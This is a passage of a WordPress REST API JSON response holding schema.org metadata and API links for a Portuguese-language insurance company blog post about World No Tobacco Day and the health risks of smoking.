vida?","datePublished":"2020-05-28T14:55:03+00:00","dateModified":"2020-05-28T15:01:00+00:00","mainEntityOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/"},"wordCount":496,"commentCount":0,"publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg","articleSection":["Gest\u00e3o de Benef\u00edcios"],"inLanguage":"pt-BR","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#respond"]}]},{"@type":"WebPage","@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/","url":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/","name":"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida? - \u00d4 Insurance","isPartOf":{"@id":"https:\/\/blog.oinsurance.com.br\/#website"},"primaryImageOfPage":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage"},"image":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage"},"thumbnailUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg","datePublished":"2020-05-28T14:55:03+00:00","dateModified":"2020-05-28T15:01:00+00:00","description":"O Dia Mundial sem Tabaco foi criado pela OMS - Organiza\u00e7\u00e3o Mundial da Sa\u00fade em 1987 com o objetivo de alertar sobre as doen\u00e7as relacionadas ao tabagismo.","breadcrumb":{"@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#breadcrumb"},"inLanguage":"pt-BR","potentialAction":[{"@type":"ReadAction","target":["https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/"]}]},{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#primaryimage","url":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg","contentUrl":"https:\/\/oinsurance.com.br\/blog\/wp-content\/uploads\/2020\/05\/tabagismo_2-scaled.jpg","width":2560,"height":1707,"caption":"tabagismo"},{"@type":"BreadcrumbList","@id":"https:\/\/oinsurance.com.br\/blog\/dia-mundial-sem-tabaco\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"In\u00edcio","item":"https:\/\/blog.oinsurance.com.br\/"},{"@type":"ListItem","position":2,"name":"Voc\u00ea conhece os riscos que o tabagismo pode causar na sua vida?"}]},{"@type":"WebSite","@id":"https:\/\/blog.oinsurance.com.br\/#website","url":"https:\/\/blog.oinsurance.com.br\/","name":"\u00d4 Insurance","description":"Seguros Pessoais e Empresariais","publisher":{"@id":"https:\/\/blog.oinsurance.com.br\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/blog.oinsurance.com.br\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pt-BR"},{"@type":"Organization","@id":"https:\/\/blog.oinsurance.com.br\/#organization","name":"\u00d4 Insurance","url":"https:\/\/blog.oinsurance.com.br\/","logo":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/","url":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","contentUrl":"https:\/\/i1.wp.com\/oinsurance.com.br\/wp-content\/uploads\/2019\/07\/slice1.png?fit=409%2C179&ssl=1","width":409,"height":179,"caption":"\u00d4 Insurance"},"image":{"@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/logo\/image\/"},"sameAs":["https:\/\/www.facebook.com\/oinsurancegroup\/","https:\/\/www.instagram.com\/oinsurance\/","https:\/\/www.linkedin.com\/company\/oinsurance\/"]},{"@type":"Person","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/bbbd7625295ecaf945a113b1caffc223","name":"Rafael Gesser","image":{"@type":"ImageObject","inLanguage":"pt-BR","@id":"https:\/\/blog.oinsurance.com.br\/#\/schema\/person\/image\/","url":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/9cae75a105f283c49e84546685680841?s=96&d=mm&r=g","caption":"Rafael Gesser"}}]}},"_links":{"self":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2777"}],"collection":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/users\/4"}],"replies":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/comments?post=2777"}],"version-history":[{"count":0,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/posts\/2777\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media\/2780"}],"wp:attachment":[{"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/media?parent=2777"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/categories?post=2777"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/oinsurance.com.br\/blog\/wp-json\/wp\/v2\/tags?post=2777"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}